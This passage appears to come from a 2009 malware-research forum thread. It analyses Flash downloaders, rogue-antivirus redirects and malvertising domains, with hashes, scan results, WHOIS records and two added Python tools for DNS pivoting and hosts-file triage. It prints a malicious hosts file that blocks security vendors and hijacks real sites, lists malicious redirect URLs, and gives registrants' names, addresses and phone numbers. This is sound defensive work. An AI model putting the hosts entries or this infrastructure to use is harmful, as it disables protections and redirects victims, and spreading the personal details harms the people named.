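    "ns1.clean.example": {"198.51.100.53"},
}
# Constructed delegations (domain -> nameserver hostnames).
NS_RECORDS = {
    "whereismat.cn": ["ns1.airflysupport.com", "ns3.airflysupport.com"],
    "othersideofmoon.cn": ["ns1.airflysupport.com", "ns3.airflysupport.com"],
    "antivirus360-protection.com": ["ns1.freehostns.com", "ns3.freeyourdns.com"],
    "unrelated.example": ["ns1.clean.example"],
}

def by_ip(a_records):
    """Invert hostname -> IPs into IP -> hostnames."""
    index = defaultdict(set)
    for host, ips in a_records.items():
        for ip in ips:
            index[ip].add(host)
    return index

def hosts_sharing_ip(seed, a_records=A_RECORDS):
    """'hostnames sharing ip with a-records': everything on the seed's IPs."""
    index = by_ip(a_records)
    shared = set()
    for ip in a_records.get(seed, ()):
        shared |= index[ip]
    shared.discard(seed)
    return sorted(shared)

def domains_sharing_ns(seed, ns_records=NS_RECORDS):
    """Domains delegated to at least one of the seed's nameservers by name."""
    mine = set(ns_records.get(seed, ()))
    return sorted(d for d, nss in ns_records.items() if d != seed and mine & set(nss))

def other_ns_names(seed, a_records=A_RECORDS, ns_records=NS_RECORDS):
    """'other names of the nameservers': hostnames that resolve to the same IPs
    as the seed's nameservers, minus the names the seed itself is delegated to."""
    index = by_ip(a_records)
    aliases = set()
    for ns in ns_records.get(seed, ()):
        for ip in a_records.get(ns, ()):
            aliases |= index[ip]
    aliases.difference_update(ns_records.get(seed, ()))
    return sorted(aliases)

def domains_on_ns_aliases(seed, a_records=A_RECORDS, ns_records=NS_RECORDS):
    """'domains sharing nameservers under another name'."""
    aliases = set(other_ns_names(seed, a_records, ns_records))
    return sorted(d for d, nss in ns_records.items() if d != seed and aliases & set(nss))

def pivot(seed, a_records=A_RECORDS, ns_records=NS_RECORDS):
    """Run all three pivots for one seed domain."""
    return {
        "shared_ip": hosts_sharing_ip(seed, a_records),
        "shared_ns": domains_sharing_ns(seed, ns_records),
        "ns_aliases": other_ns_names(seed, a_records, ns_records),
        "domains_via_aliases": domains_on_ns_aliases(seed, a_records, ns_records),
    }

if __name__ == "__main__":
    for label, names in pivot("whereismat.cn").items():
        print(label, names)
```

The nameserver-alias step is the one that grows a cluster fastest: a registrar-level change of NS hostnames does not move the server, so pivoting on the nameserver's IP rather than its name keeps following the same operator.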
Kimberly
<h4>
Flash.swf & File.exe
</h4>
Flash.swf.
Additional information
File size: 16515 bytes
MD5...: 33c1681a16abfa04013eb65c94161154
SHA1..: 8330926f89b31ab1f30af375d6faa152c85103b6
SHA256: 51dab85fbea24acb490f435d71e026e2c0005a57010ae8fc0f44e5a3a92b3720
packers (Kaspersky): Swf2Swc

File Flash.swf received on 03.09.2009 21:25:00 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.09 -
AhnLab-V3 5.0.0.2 2009.02.27 -
AntiVir 7.9.0.107 2009.03.09 -
Authentium 5.1.0.4 2009.03.09 -
Avast 4.8.1335.0 2009.03.09 -
AVG 8.0.0.237 2009.03.09 -
BitDefender 7.2 2009.03.09 -
CAT-QuickHeal 10.00 2009.03.09 -
ClamAV 0.94.1 2009.03.09 -
Comodo 1039 2009.03.09 -
DrWeb 4.44.0.09170 2009.03.09 -
eSafe 7.0.17.0 2009.03.09 -
eTrust-Vet 31.6.6387 2009.03.09 -
F-Prot 4.4.4.56 2009.03.09 -
F-Secure 8.0.14470.0 2009.03.09 -
Fortinet 3.117.0.0 2009.03.09 -
GData 19 2009.03.09 -
Ikarus T3.1.1.45.0 2009.03.09 -
K7AntiVirus 7.10.664 2009.03.09 -
Kaspersky 7.0.0.125 2009.03.09 -
McAfee 5548 2009.03.09 -
McAfee+Artemis 5548 2009.03.09 -
Microsoft 1.4405 2009.03.09 -
NOD32 3922 2009.03.09 -
Norman 6.00.06 2009.03.09 -
nProtect 2009.1.8.0 2009.03.09 -
Panda 10.0.0.10 2009.03.09 -
PCTools 4.4.2.0 2009.03.09 -
Prevx1 V2 2009.03.09 -
Rising 21.20.02.00 2009.03.09 -
SecureWeb-Gateway 6.7.6 2009.03.09 -
Sophos 4.39.0 2009.03.09 -
Sunbelt 3.2.1858.2 2009.03.08 -
Symantec 1.4.4.12 2009.03.09 -
TheHacker 6.3.3.0.277 2009.03.09 -
TrendMicro 8.700.0.1004 2009.03.09 -
VBA32 3.12.10.1 2009.03.09 -
ViRobot 2009.3.9.1641 2009.03.09 -
VirusBuster 4.5.11.0 2009.03.09 -
Kaspersky: Exploit.SWF.Downloader.mb

Flash Code.
XORed binary data containing a link to an executable on the same server.

File.exe.
Additional information
File size: 23553 bytes
MD5...: 1bd63d9e587d478d3f372899931d4858
SHA1..: 66a51e05ca85f9b8203d45a4e00c8d3e61400fde
SHA256: cd60755f67a26626b5e26de0e19d101341382bc4c8655be0fd7c9795d4aac96f
ThreatExpert Info

File File.exe received on 03.11.2009 08:30:04 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.11 Packed.Win32.Krap!IK
AhnLab-V3 5.0.0.2 2009.03.11 -
AntiVir 7.9.0.107 2009.03.10 TR/PCK.Krap.I.24
Authentium 5.1.0.4 2009.03.10 -
Avast 4.8.1335.0 2009.03.10 Win32:Trojan-gen {Other}
AVG 8.0.0.237 2009.03.10 I-Worm/Nuwar.AQ
BitDefender 7.2 2009.03.11 Backdoor.Bot.87303
CAT-QuickHeal 10.00 2009.03.11 -
ClamAV 0.94.1 2009.03.11 -
Comodo 1046 2009.03.10 -
DrWeb 4.44.0.09170 2009.03.11 Trojan.Inject.5512
eSafe 7.0.17.0 2009.03.09 Win32.Spam.Mailbot.H
eTrust-Vet 31.6.6388 2009.03.09 -
F-Prot 4.4.4.56 2009.03.10 -
F-Secure 8.0.14470.0 2009.03.11 Packed.Win32.Krap.i
Fortinet 3.117.0.0 2009.03.10 W32/Krap.I!tr
GData 19 2009.03.11 Backdoor.Bot.87303
Ikarus T3.1.1.45.0 2009.03.11 Packed.Win32.Krap
K7AntiVirus 7.10.665 2009.03.10 Packed.Win32.Krap.i
Kaspersky 7.0.0.125 2009.03.11 Packed.Win32.Krap.i
McAfee 5549 2009.03.10 Spam-Mailbot.h.gen.a
McAfee+Artemis 5549 2009.03.10 Spam-Mailbot.h.gen.a
Microsoft 1.4405 2009.03.11 TrojanDownloader:Win32/Bredolab.B
NOD32 3925 2009.03.11 probably a variant of Win32/Kryptik.KF
Norman 6.00.06 2009.03.10 W32/Smalltroj.MFEU
nProtect 2009.1.8.0 2009.03.11 -
Panda 10.0.0.10 2009.03.10 Suspicious file
PCTools 4.4.2.0 2009.03.10 -
Prevx1 V2 2009.03.11 High Risk Worm
Rising 21.20.21.00 2009.03.11 Trojan.Win32.Nodef.fct
SecureWeb-Gateway 6.7.6 2009.03.10 Trojan.PCK.Krap.I.24
Sophos 4.39.0 2009.03.11 -
Sunbelt 3.2.1858.2 2009.03.10 -
Symantec 1.4.4.12 2009.03.11 Trojan Horse
TheHacker 6.3.3.0.278 2009.03.11 -
TrendMicro 8.700.0.1004 2009.03.11 -
VBA32 3.12.10.1 2009.03.11 -
ViRobot 2009.3.11.1644 2009.03.11 Spyware.Krap.Packed.23553.A
VirusBuster 4.5.11.0 2009.03.10 -
Kimberly
<h4>
i45.swf - a8.css
</h4>
addFrameScript, yet another interesting method to load malicious content in Flash files.
Obfuscation Techniques
Invalid tags - Tag Type 255 at file byte offset 27
Invalid Images - Tag DefineBits (offset 0x0000001e) does not contain a valid image

Kaspersky: Exploit.SWF.Downloader.hn

a8.css - Trojan-Downloader.Win32.Agent.bkia

Downloaded by i45.swf, a8.css installs itself as a driver on the system. Around 20 files are requested from a server in China. A text file named ook.txt containing the same links plus 11 other malicious files is part of the "bundle" you'll get when this critter runs on your computer. Interesting fact: ad.jpg is a hosts file, not an image.
QUOTE
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 zzz.2008wyt.net
127.1.1.1 999.2005wyt.com
127.1.1.1 219.152.120.240
127.0.0.0 ww.popdm.cn
127.1.1.1 bbt.etimes888.com
127.1.1.1 219.147.13.53
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.1.1.1 www.sunlight.org.cn
127.1.1.1 w.wonthe.cn
127.1.1.1 20068080.cn
127.1.1.1 l.neter888.cn
127.1.1.1 stat.untang.com
127.1.1.1 www.ikdy.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.1.1.1 999.hfdy2828.com
127.1.1.1 www.hfdy2929.com
127.1.1.1 www.xiazaide1.cn
127.1.1.1 www.vuf51579.cn
127.1.1.1 wm.eo2q.cn
127.1.1.1 d.www-263.com
127.1.1.1 www.ssy1688.cn
127.1.1.1 121.12.173.218
127.1.1.1 qq.18i16.net
127.1.1.1 a.baidu-6661.com
127.1.1.1 www.vuf51579.cn
127.1.1.1 www.1079223105.cn
127.1.1.1 home.xzx6.cn
127.1.1.1 top.fgc3.cn
127.1.1.1 165.246.44.228
127.1.1.1 wwww.ttfafa.com
127.1.1.1 pa.tt-09.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 220.250.64.21
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
222.189.238.6 biz5c.sandai.net
222.189.238.6 recommend.xunlei.com
222.189.238.6 news.51uc.com
222.189.238.6 chat.sina.com.cn
222.189.238.6 hallcenter.ourgame.com
The complete ThreatExpert report is available here.
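As an added example (not part of the post above), here is a small Python checker that parses a dropped hosts file like ad.jpg and sorts its entries into the categories a responder cares about: loopback entries aimed at security vendors (the Kaspersky, 360safe and VeriSign CRL lines), plain sinkholes, entries that send a legitimate site to a real third-party address (the 222.189.238.6 lines), and lines with no effect because the name side is an IP literal or host:port, which a resolver never looks up. The sample is an excerpt of the listing above; the vendor keyword list and the category names are this example's own assumptions.

```python
import ipaddress
import re

# Excerpt of the hosts file dropped as ad.jpg (lines copied from the listing above).
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 www.google-analytics.com
222.189.238.6 recommend.xunlei.com
222.189.238.6 chat.sina.com.cn
# a comment line
"""

# Assumed keyword list: hostname fragments that mark an entry as aimed at
# security tooling (AV update servers, certificate revocation lists).
SECURITY_PATTERNS = ("kaspersky", "360safe", "verisign", "symantec", "mcafee")
LEGIT_LOOPBACK = {"localhost"}
IPV4_LITERAL = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def parse_hosts(text):
    """Return (ip, name) pairs from hosts-file text, skipping comments and blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) < 2:
            continue
        for name in parts[1:]:          # one line may list several names
            entries.append((parts[0], name))
    return entries

def classify(ip, name):
    """Classify one entry; see the lead-in for what each label means."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return "unparseable"
    if ":" in name or IPV4_LITERAL.fullmatch(name):
        # An IP literal or host:port is never submitted to name resolution,
        # so this line can never match; it was copied from a blocklist format.
        return "no-effect"
    lowered = name.lower()
    if addr.is_loopback:                 # all of 127.0.0.0/8, so 127.1.1.1 and 127.0.0.0 count
        if lowered in LEGIT_LOOPBACK:
            return "normal"
        if any(p in lowered for p in SECURITY_PATTERNS):
            return "blocks-security"
        return "sinkholed"
    return "hijacked"                    # a real site sent to a third-party address

def analyze(text):
    """Group the names in a hosts file by category, preserving file order."""
    report = {}
    for ip, name in parse_hosts(text):
        report.setdefault(classify(ip, name), []).append(name)
    return report

if __name__ == "__main__":
    for label, names in analyze(SAMPLE_HOSTS).items():
        print(f"{label:16s} {len(names):3d}  {', '.join(names)}")
```

The "hijacked" bucket is the one to escalate first: a loopback entry only breaks something, while an entry pointing at a routable address means the victim's traffic for that site is being served by the attacker's box.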
Kimberly
<h4>
mofideju.ru - beststateuniversity.cn - bestantimalwarescanner.com
</h4>
Antivirus 2009 / 2010 / 360 Redirects
mofideju.ru/t.php?x1=[*]&x2=&x3=[*]
beststateuniversity.cn/soft.php?aid=[*]&d=1&refer=[*]
bestantimalwarescanner.com/promo/1/freescan.php?nu=[*]&back=[*]
mofideju.ru - 87.248.180.88

nserver: ns-alt.starnet.md.
nserver: ns.starnet.md.
person: Iosif S Viktorov
phone: +7 4232 579552
e-mail: viktorov@smtp.ru
registrar: REGRU-REG-RIPN
created: 2009.01.12

beststateuniversity.cn - 83.133.126.201

Details

bestantimalwarescanner.com - 194.165.4.7 / 209.160.20.117

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.BASICSTECHNOLOGY.COM - NS2.BASICSTECHNOLOGY.COM - NS3.BASICSTECHNOLOGY.COM
Updated Date: 06-mar-2009
Creation Date: 03-mar-2009
Kimberly
<h4>
WARNING: hotmail.com
</h4>
Be very careful when visiting Hotmail; redirects to Antivirus 360 have been reported. The possible presence of a malvertizement is not excluded. Any additional information is welcome in order to alert the appropriate parties.
Kimberly
<h4>
.htaccess redirects to blackpornmix.com
</h4>
Redirects.
blackpornmix.com/in.cgi?4 & parameter=[*]
wwwsafetyscan.com/hitin.php?land=[*]&affid=[*]

blackpornmix.com/in.cgi?4 & parameter=[*]
onlinestabilityexamine.com/hitin.php?land=[*]&affid=[*]

blackpornmix.com/in.cgi?4 & parameter=[*]
securedradiostation.cn/soft.php?aid=[*]&d=1&refer=[*]
best-antimalware-scanner.com/promo/1/freescan.php?nu=[*]&back[*]
Cookies on blackpornmix.com are pointing to us-euro.biz.

Interesting detail: wwwsafetyscan.com and onlinestabilityexamine.com use a Flash file to trigger the download if the victim clicks on the OK button. The u and t params from the link are used in the ActionScript in conjunction with the getURL method.
<h4>
IP details
</h4>
blackpornmix.com - 195.190.13.234

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Updated Date: 28-feb-2009
Creation Date: 19-sep-2008
Registration Service Provided By: ERDOMAIN.COM
Registrant: PrivacyProtect.org
______________________________

wwwsafetyscan.com - 78.129.166.225

Domain Name: WWWSAFETYSCAN.COM
Registrar: REGTIME LTD.
Name Server: NS1.WWWSAFETYSCAN.COM - NS2.WWWSAFETYSCAN.COM
Updated Date: 11-mar-2009
Creation Date: 09-mar-2009

Registrant:
Sherry Reed
Email: sherrymikereed@gmail.com
Address: 4712 Ralph Drive
City: Columbia Station
State: OH
ZIP: 44028
Country: US
Phone: +1.4402369141
______________________________

securedradiostation.cn - 78.47.91.153

ROID: 20090217s10001s99362461-cn
Administrative Email: RoderickKiewiet@gmail.com
Sponsoring Registrar: 广东时代互联科技有限公司 (Guangdong Times Internet Technology Co., Ltd.)
Name Server:ns1.basicstechnology.com - ns2.basicstechnology.com - ns3.basicstechnology.com
Registration Date: 2009-02-17 20:43
Expiration Date: 2010-02-17 20:43
______________________________

onlinestabilityexamine.com - 194.165.4.20

Registrar: REGTIME LTD.
Name Server: NS1.ONLINESTABILITYEXAMINE.COM - NS2.ONLINESTABILITYEXAMINE.COM
Updated Date: 04-mar-2009
Creation Date: 03-mar-2009

Registrant:
Alberta Victory
Email: victoryalbertagreg@gmail.com
Address: 3913 Eagle Drive
City: Southfield
State: MI
ZIP: 48235
Country: US
Phone: +1.7347361198
______________________________

best-antimalware-scanner.com - 78.47.91.153 / 83.133.123.174 / 83.133.127.93

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.BASICSTECHNOLOGY.COM - NS2.BASICSTECHNOLOGY.COM - NS3.BASICSTECHNOLOGY.COM
Updated Date: 06-mar-2009
Creation Date: 03-mar-2009

Registrant:
Name: Wilkinson S Judy
Address: Unit 17 Circuit Drive
City: Hendon
Province/state: Adelaide
Country: AU
Postal Code: 201423
Phone: +6.1883472889
Fax: +6.1883472889
Email: info@go2util.com
Kimberly
<h4>
measurehits.com - hitoptimist.com - perfect-banner.com
</h4>
First of all, measurehits.com and hitoptimist.com are used in a malvertizement featuring Hewlett-Packard aka HP. The malicious banner has been built with some older obfuscation techniques from last year using Flash 6.
Next we will have a closer look at perfect-banner.com, a domain sharing its name server with measurehits.com.

Banner.
Campaign.
measurehits.com/?cmpid=[*]&subaff=[*]
hitoptimist.com/c/index.php?id=[*]
Nameservers from measurehits.com reveal another interesting domain called perfect-banner.com. Sounds perfect for an advertising bureau, doesn't it? Navigating to the website does not reveal an advertising bureau but a login page for OpenX, a free ad server for web publishers. See also Wikipedia. All content from perfect-banner.com should be treated with extreme caution.
<h4>
IP Details
</h4>
measurehits.com - 212.117.165.128

Registrar: YESNIC CO. LTD.
Whois Server: whois.yesnic.com
Name Server: NS1.MEASUREHITS.COM - NS2.MEASUREHITS.COM - NS3.MEASUREHITS.COM
Updated Date: 05-mar-2009
Creation Date: 26-feb-2009
Registrant:
Name : Gabriel Jenks
Email : gabrielcjenks17@mail.com
Address : 3515 Cooks Mine Road
Zipcode : 88101
Nation : US
Tel : 1 505-763-5453

hostnames sharing ip with a-records

statsnclick.com | waytotheprofit.com

other names of the nameservers

89-149-226-121.internetserviceteam.com | mail.xxx-online.in | ns1.hit-detect.com | ns1.statisticsishere.com | ns1.statsnclick.com | ns2.02sta.com | ns2.admediastats.com | ns2.hit-detect.com | ns2.onlinestatsmanager.com | ns2.perfect-banner.com | ns2.promorotation.com | ns2.securityclick.net | ns2.st-athome.net | ns2.st-aticglobalsources.com | ns2.statisticsishere.com | ns2.statsnclick.com | ns2.themonitoring.net | ns2.traffic-analytics.com | ns2.waytotheprofit.com | ns3.02sta.com | ns3.admediastats.com | ns3.hit-detect.com | ns3.perfect-banner.com | ns3.promorotation.com | ns3.securityclick.net | ns3.st-athome.net | ns3.st-aticglobalsources.com | ns3.statisticsishere.com | ns3.statsnclick.com | ns3.themonitoring.net | ns3.traffic-analytics.com | ns3.waytotheprofit.com | ns4.02sta.com | ns4.admediastats.com | ns4.hit-detect.com | ns4.onlinestatsmanager.com | ns4.perfect-banner.com | ns4.promorotation.com | ns4.securityclick.net | ns4.st-athome.net | ns4.st-aticglobalsources.com | ns4.statsnclick.com | ns4.themonitoring.net | ns4.traffic-analytics.com | ns4.waytotheprofit.com | www.xxx-online.in
______________________________

hitoptimist.com - 88.198.8.15

Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Updated Date: 10-mar-2009
Creation Date: 10-mar-2009
Contact Information : Private

hostnames sharing ip with a-records

cosmotraf.net | download.pcprivacycleaner.com | download.powerfulvirusremover2008.com | static.88-198-8-15.clients.your-server.de | sw.effectiveload.com | ydmstats.com
______________________________

perfect-banner.com - 89.149.244.137

Website Title: OpenX
IP Location - Germany - Netdirekt E.k
Registrar: ENOM, INC.
Name Server: NS1.PERFECT-BANNER.COM - NS2.PERFECT-BANNER.COM - NS3.PERFECT-BANNER.COM -NS4.PERFECT-BANNER.COM
Updated Date: 11-mar-2009
Creation Date: 10-mar-2009

Registrant Contact: Nexton Limited
Whois Agent (support@ruler-domains.com)
+380993161649
Fax: +380993161649
Irpinskaya 69
Kiev, 03142
UA
Kimberly
<h4>
Flash.swf & Load.exe
</h4>
Flash.swf.
Additional information
File size: 16601 bytes
MD5...: ab82af086b8de27dd83e302b0a41396c
SHA1..: 644a24540d832774e4683124d27f33bae84bd06e
SHA256: 399fbcd983158c9f741684706ae45402a13995338a4f01eaf7d9a6ad6828e290
PEInfo: -
packers (Kaspersky): Swf2Swc

File flash.swf received on 03.27.2009 11:06:52 (CET)

QUOTE

a-squared 4.0.0.101 2009.03.27 -
AhnLab-V3 5.0.0.2 2009.03.27 -
AntiVir 7.9.0.129 2009.03.27 -
Antiy-AVL 2.0.3.1 2009.03.27 -
Authentium 5.1.2.4 2009.03.27 -
Avast 4.8.1335.0 2009.03.26 -
AVG 8.5.0.283 2009.03.27 -
BitDefender 7.2 2009.03.27 -
CAT-QuickHeal 10.00 2009.03.26 -
ClamAV 0.94.1 2009.03.27 -
Comodo 1086 2009.03.27 -
DrWeb 4.44.0.09170 2009.03.27 -
eSafe 7.0.17.0 2009.03.26 -
eTrust-Vet 31.6.6420 2009.03.27 -
F-Prot 4.4.4.56 2009.03.26 -
F-Secure 8.0.14470.0 2009.03.27 -
Fortinet 3.117.0.0 2009.03.27 -
GData 19 2009.03.27 -
Ikarus T3.1.1.48.0 2009.03.27 -
K7AntiVirus 7.10.682 2009.03.26 -
Kaspersky 7.0.0.125 2009.03.27 -
McAfee 5565 2009.03.26 -
McAfee+Artemis 5565 2009.03.26 -
McAfee-GW-Edition 6.7.6 2009.03.27 -
Microsoft 1.4502 2009.03.27 -
NOD32 3968 2009.03.27 -
Norman 6.00.06 2009.03.26 -
nProtect 2009.1.8.0 2009.03.27 -
Panda 10.0.0.10 2009.03.27 -
PCTools 4.4.2.0 2009.03.26 -
Prevx1 V2 2009.03.27 -
Rising 21.22.41.00 2009.03.27 -
Sophos 4.40.0 2009.03.27 -
Sunbelt 3.2.1858.2 2009.03.26 -
Symantec 1.4.4.12 2009.03.27 -
TheHacker 6.3.3.7.292 2009.03.26 -
TrendMicro 8.700.0.1004 2009.03.27 -
VBA32 3.12.10.1 2009.03.26 -
ViRobot 2009.3.26.1664 2009.03.26 -
VirusBuster 4.6.5.0 2009.03.26 -
Flash Code.
XORed binary data containing a link to an executable on the same server. We also notice the presence of the XOR key in the code.

Load.exe.
Additional information
File size: 27136 bytes
MD5...: a7093c12e0d0e61f1720d097d1f07fc7
SHA1..: ea7e2f7358fd8fb0a989abb800a17561a144245d
SHA256: 49584e8b956242dd4958025b69d71469f1cb54298bcbcb0647b3c70241eb767c
PEiD..: -
ThreatExpert Info

File load.exe received on 03.27.2009 11:33:38 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.27 Backdoor.Win32.Zdoogu!IK
AhnLab-V3 5.0.0.2 2009.03.27 Win-Trojan/Xema.27136.G
AntiVir 7.9.0.129 2009.03.27 TR/Crypt.XPACK.Gen
Antiy-AVL 2.0.3.1 2009.03.27 -
Authentium 5.1.2.4 2009.03.27 -
Avast 4.8.1335.0 2009.03.26 Win32:Walpak
AVG 8.5.0.283 2009.03.27 Generic13.LBZ
BitDefender 7.2 2009.03.27 -
CAT-QuickHeal 10.00 2009.03.26 -
ClamAV 0.94.1 2009.03.27 -
Comodo 1086 2009.03.27 -
DrWeb 4.44.0.09170 2009.03.27 Trojan.Inject.5512
eSafe 7.0.17.0 2009.03.26 Win32.TRCrypt.XPACK
eTrust-Vet 31.6.6420 2009.03.27 -
F-Prot 4.4.4.56 2009.03.26 -
F-Secure 8.0.14470.0 2009.03.27 Backdoor.Win32.Zdoogu.bl
Fortinet 3.117.0.0 2009.03.27 -
GData 19 2009.03.27 Win32:Walpak
Ikarus T3.1.1.48.0 2009.03.27 Backdoor.Win32.Zdoogu
K7AntiVirus 7.10.682 2009.03.26 -
Kaspersky 7.0.0.125 2009.03.27 Backdoor.Win32.Zdoogu.bl
McAfee 5565 2009.03.26 -
McAfee+Artemis 5565 2009.03.26 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.03.27 Trojan.Crypt.XPACK.Gen
Microsoft 1.4502 2009.03.27 TrojanDownloader:Win32/Bredolab.B
NOD32 3969 2009.03.27 a variant of Win32/Kryptik.LI
Norman 6.00.06 2009.03.26 -
nProtect 2009.1.8.0 2009.03.27 Backdoor/W32.Zdoogu.27136
Panda 10.0.0.10 2009.03.27 -
PCTools 4.4.2.0 2009.03.26 -
Prevx1 V2 2009.03.27 High Risk Cloaked Malware
Rising 21.22.41.00 2009.03.27 -
Sophos 4.40.0 2009.03.27 -
Sunbelt 3.2.1858.2 2009.03.26 Backdoor.Win32.Zdoogu.bl
